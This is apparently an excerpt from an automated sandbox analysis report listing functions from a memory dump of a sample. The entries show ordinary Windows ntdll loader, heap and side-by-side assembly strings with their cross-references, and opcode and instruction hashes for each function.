Opcode Fuzzy Hash: b7ad589c2644ea32eb5ab0cc05f3ff4ff95c5f9664b9608af10c4868e818522b
Instruction Fuzzy Hash: 65912372645706AFD732EFA8C980B2BBBA8EF64754F05045CFB45AB290D738AC05C791

Function 01A7EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 01A7F299
R, xrefs: 01A7EB62
T, xrefs: 01A7EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 01A7EB58
{, xrefs: 01AD4643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01A7EB6C

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 2d24de60fb7a71bc27c9393c68464d944e8879cd64341dd5c2f4bed7ae3245fe
Instruction ID: 864fb734e4aa3cb907a8d1f0f511253f4ef47196ef8e536b1396265406da16e1
Opcode Fuzzy Hash: 2d24de60fb7a71bc27c9393c68464d944e8879cd64341dd5c2f4bed7ae3245fe
Instruction Fuzzy Hash: CCA24774A05A2A8FDB64CF18CD987A9BBB5AF49304F1442E9D91EA7651DB309FC0CF40

Function 01AA63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01AE413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01AE40D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01AE41FE
_LdrpInitialize, xrefs: 01AE40DF, 01AE4141, 01AE4205, 01AE425F
Delaying execution failed with status 0x%08lx, xrefs: 01AE4258
minkernel\ntdll\ldrinit.c, xrefs: 01AE40E9, 01AE414B, 01AE420F, 01AE4269

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 770defb800964f8be97d414696178fa9cb11747d8f732a293a4684d98e6532c5
Instruction ID: e1e82aeaa5d0156940ab2d0ac80902528baab8e7d883e2ec2d504f9c32712b35
Opcode Fuzzy Hash: 770defb800964f8be97d414696178fa9cb11747d8f732a293a4684d98e6532c5
Instruction Fuzzy Hash: AB914D71B00315DBEB35DF58DA48BA97BE5BF64B54F48012DE908AB2D2D7789801CB90

Function 01A6645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

LdrpInitShimEngine, xrefs: 01AC99F4, 01AC9A07, 01AC9A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AC9A01
apphelp.dll, xrefs: 01A66496
minkernel\ntdll\ldrinit.c, xrefs: 01AC9A11, 01AC9A3A
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AC9A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AC99ED

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 63562cbd4294f08e85582eed2eb222722da6ad78f195e0b70c5179a5b4969e88
Instruction ID: 2410fc4e92f4809b966ccba0e81e954c88b9e6a8340d72fe615a837934c46363
Opcode Fuzzy Hash: 63562cbd4294f08e85582eed2eb222722da6ad78f195e0b70c5179a5b4969e88
Instruction Fuzzy Hash: 01519FB1208305EFE725DF28C941BAB77E8FB94B48F04491EF599971A1DB30E905CB92

Function 01AAC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01AE8181, 01AE81F5
LdrpInitializeImportRedirection, xrefs: 01AE8177, 01AE81EB
Loading import redirection DLL: '%wZ', xrefs: 01AE8170
LdrpInitializeProcess, xrefs: 01AAC6C4
minkernel\ntdll\ldrinit.c, xrefs: 01AAC6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 01AE81E5

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 918eb1a2dec976ee57ef40c25e5c604d24e3e5d8f93f9c8aeab641791f6b5548
Instruction ID: ee5f833a75cf16d5355d21168549201695963615ddd67d777ccfdd91bc134fd8
Opcode Fuzzy Hash: 918eb1a2dec976ee57ef40c25e5c604d24e3e5d8f93f9c8aeab641791f6b5548
Instruction Fuzzy Hash: 7B31E4B1644742AFD320EF69DA45E2A77E5BFD4B24F04055CF944AB291E724EC04C7A2

Function 01AA2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AE219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AE2178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AE21BF
SXS: %s() passed the empty activation context, xrefs: 01AE2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AE2180
RtlGetAssemblyStorageRoot, xrefs: 01AE2160, 01AE219A, 01AE21BA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 3e23369cf3d69d1d617dbced71617c7277618900cc89f9f238555952db5cdf71
Instruction ID: 57cf23f19cd5d07fa0fcb10976cee3b8d7e96d067a063d1174ccc8586e404a28
Opcode Fuzzy Hash: 3e23369cf3d69d1d617dbced71617c7277618900cc89f9f238555952db5cdf71
Instruction Fuzzy Hash: C431C47AA40315BBE7219BDA8C45F5A7BB8EBA5B50F49405EFB04B7240D370DB40C7A1

Function 01AB096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01AB2DF0: LdrInitializeThunk.NTDLL ref: 01AB2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AB0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AB0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AB0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AB0D74

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 81ae86ab116d06f7818c5569afb7cabd5df2b20614e4b7ad820b0b560866605a
Instruction ID: d9093cf29bcd344eae5c7a8c1e0a3863c88d003c73ef5c70c7e87fc24135d41d
Opcode Fuzzy Hash: 81ae86ab116d06f7818c5569afb7cabd5df2b20614e4b7ad820b0b560866605a
Instruction Fuzzy Hash: 0A426C71900755DFDB21CF28C984BEAB7F8BF04314F1445AAE999DB242E770A984CF60

Function 01A7A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 01A7A3EF
6, xrefs: 01A7A3F7
LdrResFallbackLangList Exit, xrefs: 01A7A3FF
8, xrefs: 01A7A3E7

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: b8a4f27c318a1d4676408bc149c8cd10fc3f2c0d281489224dc56281e66f3d77
Instruction ID: 07146b4c5b94fdbeddff646b0d8143305e56029f3211a121c25c3388e3d4b401
Opcode Fuzzy Hash: b8a4f27c318a1d4676408bc149c8cd10fc3f2c0d281489224dc56281e66f3d77
Instruction Fuzzy Hash: 3FC1A971208782EFD711CF68C944B6EB7F4BF84704F08886AF9968B251E735CA49CB52

Function 01AA8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 01AA8591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AA855E
LdrpInitializeProcess, xrefs: 01AA8422
minkernel\ntdll\ldrinit.c, xrefs: 01AA8421

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 048b0c77430ef5b71e256e1c4535240f28f10a5cc6d44848f9cda78403e46a7b
Instruction ID: 4508bba69f8afcf1c19571a8f4e28df7bf26a1543d808ad84b5fbfbfd8c55142
Opcode Fuzzy Hash: 048b0c77430ef5b71e256e1c4535240f28f10a5cc6d44848f9cda78403e46a7b
Instruction Fuzzy Hash: 8B917F71548345AFDB21EF25CD84FABBAECFF94644F40092EFA8493151E734E9448B62

Function 01AA273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 01AE21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AE21D9, 01AE22B1
.Local, xrefs: 01AA28D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AE22B6

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: f87369abf220e7a7ebec2d569bcce88e076c5d73544aa634fc2dc9c0e6688968
Instruction ID: d51e18e28c59d293c43ad3bf7aae36777010c7cc9e2b60f901617fdb205e6aac
Opcode Fuzzy Hash: f87369abf220e7a7ebec2d569bcce88e076c5d73544aa634fc2dc9c0e6688968
Instruction Fuzzy Hash: 74A1AD3194022A9BDB25CF68CC88BA9B7B5BF58714F5441EAE908EB251D7309E90CF90

Function 01AA4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AE3456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AE342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AE3437
RtlDeactivateActivationContext, xrefs: 01AE3425, 01AE3432, 01AE3451

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 106fb87ee6e09d6b6561e51597d1c656f2411defec922823153dc7e76c07d5d0
Instruction ID: 81e16b358c2d49fa65f1f5cbef5d23ada011fe122d121b597b74a423f13503ac
Opcode Fuzzy Hash: 106fb87ee6e09d6b6561e51597d1c656f2411defec922823153dc7e76c07d5d0
Instruction Fuzzy Hash: D46121766047129BDB22CF1DC885B3AB7E0FF84B11F58852DF8599B242C774E801CB91

Function 01A764AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AD1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AD10AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AD106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AD0FE5

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: f9c9a4243aa1d0b6f5e2465316d11eebe7126cdd5cac378ecf06df042a64ecc2
Instruction ID: 062f5c10609cbc360de41e67f5f5f631aeab60add462e1c513468964bf603ba4
Opcode Fuzzy Hash: f9c9a4243aa1d0b6f5e2465316d11eebe7126cdd5cac378ecf06df042a64ecc2
Instruction Fuzzy Hash: D87110B1904745AFDB21EF28CD84B9B7FA8AF54B60F000469F9498B247D334D688DBD2

Function 01A9245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01A92462
minkernel\ntdll\ldrinit.c, xrefs: 01ADA9A2
LdrpDynamicShimModule, xrefs: 01ADA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01ADA992

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: f3b21bad75e92d0292695c267ed5f919069a7689e67b32a3e27edcd12f897f6c
Instruction ID: cb302472e4eca228de6394cc5c975db671e2f9c23861e9685f1568e0eff77517
Opcode Fuzzy Hash: f3b21bad75e92d0292695c267ed5f919069a7689e67b32a3e27edcd12f897f6c
Instruction Fuzzy Hash: 10316D76600601FBDB319F6DC985F7A77F4FB94B00F15005AE916AB2B5C7789981CB80

Function 01A829A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A8327D
HEAP[%wZ]: , xrefs: 01A83255
HEAP: , xrefs: 01A83264

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 5df572bf495c5ee4295dd8dc23722165086a9c23588505ac93fad84cd26ee098
Instruction ID: b807f9d2f631b54b7348f5f77fd1fe1fac188d043fef32e4cf014459b6f7ea4b
Opcode Fuzzy Hash: 5df572bf495c5ee4295dd8dc23722165086a9c23588505ac93fad84cd26ee098
Instruction Fuzzy Hash: BE92AB70A042499FDF25DF68C444BBEBBF1FF08704F1880AAE999AB291D735A945CF50

Function 01A80770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 01AD50CA
HEAP[%wZ]: , xrefs: 01AD50AE
HEAP: , xrefs: 01AD50BD

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c9471f2687ab3db9bc3ac480e41deca45d872ecf728b9d1d97413c58d9f1d30e
Instruction ID: 768cf56120e80b90ccd2d0b0989d9aeb9895b9fa0d5326a730fae6318d63b69c
Opcode Fuzzy Hash: c9471f2687ab3db9bc3ac480e41deca45d872ecf728b9d1d97413c58d9f1d30e
Instruction Fuzzy Hash: F4F1AD30A00A06EFEB25EF68C994B6AB7B5FF44304F1481A9F516DB391D734E985CB90

Function 01A96962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01A96C24
, xrefs: 01ADCA51

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: ce89cd7cc1c54ebc4d8e9b493c0cdb8100a1dcf3c5dbfa3fe168f40b09151bcb
Instruction ID: 90375d420248b1c43d80aa8d82d08b22bedde219db37fe04abb1388c3ef9e778
Opcode Fuzzy Hash: ce89cd7cc1c54ebc4d8e9b493c0cdb8100a1dcf3c5dbfa3fe168f40b09151bcb
Instruction Fuzzy Hash: CCC280716187419FEB25CF68C881BABBBE5BF88714F04892DF989C7241D734D885CB62

Function 01A6A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 01A6A1C1
\??\, xrefs: 01ACC1E4
FilterFullPath, xrefs: 01ACC2E6

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 03d86354ddd03aabfbbc62a3dfe8323879a10b40042329a2bc5ea323e44ada61
Instruction ID: 5acdf95d50b8fed3852587e8d4bcfee34de62e5829330a575bdf7cc18e59283d
Opcode Fuzzy Hash: 03d86354ddd03aabfbbc62a3dfe8323879a10b40042329a2bc5ea323e44ada61
Instruction Fuzzy Hash: CAA16A759112299BDF319F68CD88BEAB7B8EF44B10F0041EAE90DA7251D735AE84CF50

Function 01A90BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 01ADA117
minkernel\ntdll\ldrinit.c, xrefs: 01ADA121
Failed to allocated memory for shimmed module list, xrefs: 01ADA10F

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: b5cb6e07279ac567baf1dfcd94de9554f0ece2083231ddad1e2de555f2d3d76f
Instruction ID: 649abe940b8e21f9df4f5e40895ce395de682403ce557ff5b78e7116ff92663c
Opcode Fuzzy Hash: b5cb6e07279ac567baf1dfcd94de9554f0ece2083231ddad1e2de555f2d3d76f
Instruction Fuzzy Hash: 5271C071A00605DFDF25DF68CA81ABEB7F8FB54744F18402DE806E7261E738AA81CB50

Function 01A80A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01AD5335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 01AD534D
HEAP: , xrefs: 01AD5342

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 1c80d2a9c60ab53b7e5378eb4e65d48f496a71bc97bfe5a3502fc09941ca0473
Instruction ID: a383bceef99665702ac7fddcb29444ee9418a56cc1d3bbe9bbd0ab20fb744910
Opcode Fuzzy Hash: 1c80d2a9c60ab53b7e5378eb4e65d48f496a71bc97bfe5a3502fc09941ca0473
Instruction Fuzzy Hash: 9E61BE70A00701AFDB29DF28C554B6ABBF1FF45704F18856AE45A8B292D770E885CB91

Function 01AAC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 01AE82D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01AE82DE
minkernel\ntdll\ldrinit.c, xrefs: 01AE82E8

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 600d6bc685c028ec4bf2beb80e570fe9571685f96577327baceb70205584059f
Instruction ID: aba7a99999a4b9293e8fcefca483079df2d93861c1b8bf31a3600ccf07fb8c17
Opcode Fuzzy Hash: 600d6bc685c028ec4bf2beb80e570fe9571685f96577327baceb70205584059f
Instruction Fuzzy Hash: D74106B1544301AFD721EB68DE44B6B7BE8FF64760F04492AF949D32A5EB78D800CB91

Function 01B2C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B2C1C5
PreferredUILanguages, xrefs: 01B2C212
@, xrefs: 01B2C1F1

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 0089fa7e46e2ffa6b81863b63e481a0a832ed190821a7e2d2b5579461d64a3d1
Instruction ID: 36f7ea981a605943f4e87a94984d70649df67df2257813b3823d90ee1efdcc4a
Opcode Fuzzy Hash: 0089fa7e46e2ffa6b81863b63e481a0a832ed190821a7e2d2b5579461d64a3d1
Instruction Fuzzy Hash: 2D416271E00219EBDF15DED8C981FEEBBBCEB15700F1441AAEA09B7240DB749A498B50

Function 01B04144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01B04172
@, xrefs: 01B04225
LdrpResValidateFilePath Enter, xrefs: 01B04160

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: fe94138e56296fa55242b5ab8a79ec3ca25b53562e10bbe4d322141ef4a54b86
Instruction ID: 02d10db795af3d40ae40ac70af8c5d4d7231437fa16be812d2b00cbdd04ede8f
Opcode Fuzzy Hash: fe94138e56296fa55242b5ab8a79ec3ca25b53562e10bbe4d322141ef4a54b86
Instruction Fuzzy Hash: B2411172A042498BEB2BDBE9C940BADBFB8FF55740F14049ADA01EB7D1DB349901CB10

Function 01AF4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01AF4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AF4888
LdrpCheckRedirection, xrefs: 01AF488F

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: c3258ff88e68297af40832a503cc48970c8d283b7ed2fae80261d68b5b62daba
Instruction ID: 264c176d78cb7c2f67128bbdc07907314f9949d4bd6dd9c679ea0fca4f571bf3
Opcode Fuzzy Hash: c3258ff88e68297af40832a503cc48970c8d283b7ed2fae80261d68b5b62daba
Instruction Fuzzy Hash: 25419D32A046519BCB22CFA9D940A27BBE4BB8DB50F09056DFE8897365D730E800CBD1

Function 01A80BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01AD5431
HEAP: , xrefs: 01AD543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01AD5449

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: e2de7c7af90c8b5433f5dfeb6dd6f53104ab5cd996384521d6f63a8d14d084b3
Instruction ID: b34bcd30a326e742610bfa1a58ab7837fb0ed4a36e80ceeef38604216f48cf3a
Opcode Fuzzy Hash: e2de7c7af90c8b5433f5dfeb6dd6f53104ab5cd996384521d6f63a8d14d084b3
Instruction Fuzzy Hash: 851103727159429FDB29EB28C544F76B7B6EF40626F188129F407CB292DB30D844C752

Function 01AF20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01AF20F3
LdrpInitializationFailure, xrefs: 01AF20FA
minkernel\ntdll\ldrinit.c, xrefs: 01AF2104

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 3dfe69e85f376dcf869f351b7fb54440321b62108840dcaccf9630dfe9131626
